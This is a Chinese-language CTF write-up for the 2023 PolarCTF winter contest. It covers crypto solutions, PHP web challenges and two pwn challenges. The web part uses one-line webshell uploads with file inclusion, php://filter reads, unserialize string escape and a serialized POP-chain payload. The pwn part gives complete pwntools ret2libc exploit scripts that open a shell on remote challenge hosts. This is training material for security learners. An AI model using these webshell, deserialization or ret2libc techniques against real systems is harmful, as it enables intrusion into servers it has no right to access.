2023Polar CTF冬季个人挑战赛部分wp
第一次参加polarctf的比赛,做的不好,把做出来的题目wp传上来和大家分享做题方法,哪里有错还请大佬指教。
题目还能复现的,在平台上就能做
misc
1-1 签到喵
crypto
2-5base
需要base64换表
先将j2rXjx8wSZjD根据给出的密码表进行替换成正常的base
然后base解码
2-6AFF
仿射加密法
题目输出没给,只能爆破a和b
采用爆破的方法,寻找满足的flag
这里都要转换成小写字母,因为后面ascci码-65操作的
flag = "WMPTPTRGGPED"
flaglist = []
for i in flag:
flaglist.append(ord(i) - 65)
for a in range(1, 26):
for b in range(1, 26):
flags = ""
for i in flaglist:
for j in range(0, 26):
c = (a * j - b) % 26
if (c == i):
flags += chr(j + 65)
print('flag{' + flags + '}')
web
3-1 cool
3-5 ezphp
暴露给爬虫了,联想到robots.txt
File.php 一个文件包含
upload.php 一个文件上传
上传一个文件名为shell.jpg,文件内容为一句话木马
然后文件包含就行
3-6 你的马呢?
http://fb602834-16d0-4a66-ad42-cab8127f56f3.www.polarctf.com:8090/index.php?file=php://filter/read=convert.base64-encode/resource=upload.php
http://fb602834-16d0-4a66-ad42-cab8127f56f3.www.polarctf.com:8090/index.php?file=php://filter/read=convert.base64-encode/resource=upload.php
有文件内容检测
用<?=代替<?php
上传一个文件名为shell.jpg,文件内容为一句话木马
然后文件包含就行
3-8 phpurl
这里有一个url解码操作,用burpsuite将xss进行两次url编码
Payload: index.php?sys=%2578%2578%2573
flag{5caecd63b7dca4bcee15d262eb3af4f4}
3-10 你想逃也逃不掉
源码如下
<?php
/*
https://ytyyds.github.io/ (与本题无关)
*/
error_reporting(0);
highlight_file(__FILE__);
function filter($string){
return preg_replace( '/phtml|php3|php4|php5|aspx|gif/','', $string);
}
$user['username'] = $_POST['name'];
$user['passwd'] = $_GET['passwd'];
$user['sign'] = '123456';
$ans = filter(serialize($user));
if(unserialize($ans)[sign] == "ytyyds"){
echo file_get_contents('flag.php');
}
需要构造字符串逃逸去绕过
参数如下
3-11 safe_include
思路:构造一句话写入session
根据 参数包含 /tmp/sess_写入值
题目源码
<?php
show_source(__FILE__);
@session_start();
ini_set('open_basedir', '/var/www/html/:/tmp/');
$sys = @$_SESSION['xxs'];
if (isset($_GET['xxs'])) {
$sys = $_GET['xxs'];
}
@include $sys;
$_SESSION['xxs'] = $sys;
先进行构造参数一句话木马
再包含 ?xxs=/tmp/sess_45127ho2viath8q3602pobfu71
成功读取flag
3-12 苦海
反序列化,构造pop链
<?php
class User
{
public $name;
public $flag;
}
class FileRobot
{
public $filename = '../flag.php';
public $path;
}
class Surrender
{
private $phone;
public $promise;
}
$user = new User();
$s = new Surrender();
$f1 = new FileRobot();
$f2 = new FileRobot();
$f1->path = $f2;
$user->name = $s;
$user->name->file = ['filename' => $f1];
// 序列化和输出
echo urlencode(serialize($user));
利用如下pop:
O%3A4%3A%22User%22%3A2%3A%7Bs%3A4%3A%22name%22%3BO%3A9%3A%22Surrender%22%3A3%3A%7Bs%3A16%3A%22%00Surrender%00phone%22%3BN%3Bs%3A7%3A%22promise%22%3BN%3Bs%3A4%3A%22file%22%3Ba%3A1%3A%7Bs%3A8%3A%22filename%22%3BO%3A9%3A%22FileRobot%22%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A11%3A%22..%2Fflag.php%22%3Bs%3A4%3A%22path%22%3BO%3A9%3A%22FileRobot%22%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A11%3A%22..%2Fflag.php%22%3Bs%3A4%3A%22path%22%3BN%3B%7D%7D%7D%7Ds%3A4%3A%22flag%22%3BN%3B%7D
获得:hi, Welcome to Polar D&N ~ PD9waHAgDQoJJGZsYWcgPSAnZmxhZ3s2M2RkMGU5ZmJhZGQ2NjM1NDJhMmY4ZWExY2NjNjc2NX0nOw0KCT8+
Base64解密得到flag
pwn
5-4 look
32位程序,开了栈不可执行
用Ida反编译
在start函数中存在栈溢出漏洞
但程序没有可以获取shell的函数,要先泄露libc,找到system,再通过栈溢出getshell
简单的32位ret2libc
Exp:
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p=remote('120.46.59.242',2141)
write_plt=0x80483E0
write_got=0x804A018
main=0x8048410
payload=b'a'*108+p32(0)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)
p.sendline(payload)
write_addr=u32(p.recv(4))
print(hex(write_addr))
libc_base=write_addr-0x0d44d0
bin_sh=libc_base+ 0x15912b
system=libc_base+ 0x03a950
payload=b'a'*108+p32(0)+p32(system)+p32(main)+p32(bin_sh)#+p32(bin_sh)+p32(8)
p.sendline(payload)
p.interactive()5-10 05ret2libc_64
64位的程序,开了NX
用ida反编译
通过分析在putting函数中发现存在栈溢出漏洞
但程序没有可以获取shell的函数,要先通过泄露libc地址,来找到sytem,再通过栈核栈溢出,来执行system(“/bin/sh”)
64位的Ret2libc
EXp:
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p=remote('120.46.59.242',2124)
puts_plt=0x4005A0
gets_got=0x601038
pop_rdi=0x400843
main=0x400610
payload=b'a'*256+p64(0)+p64(pop_rdi)+p64(gets_got)+p64(puts_plt)+p64(main)
p.recvuntil('question:\n')
p.sendline(payload)
p.recvuntil('Maybe the answer is 0\n')
gets_got=u64(p.recv(6).ljust(8,b'\x00'))
libc_base=gets_got- 0x06ed90
bin_sh=libc_base+ 0x18ce57
system=libc_base+ 0x0453a0
payload=b'a'*256+p64(0)+p64(pop_rdi)+p64(bin_sh)+p64(system)+p64(main)
p.sendline(payload)
p.interactive()
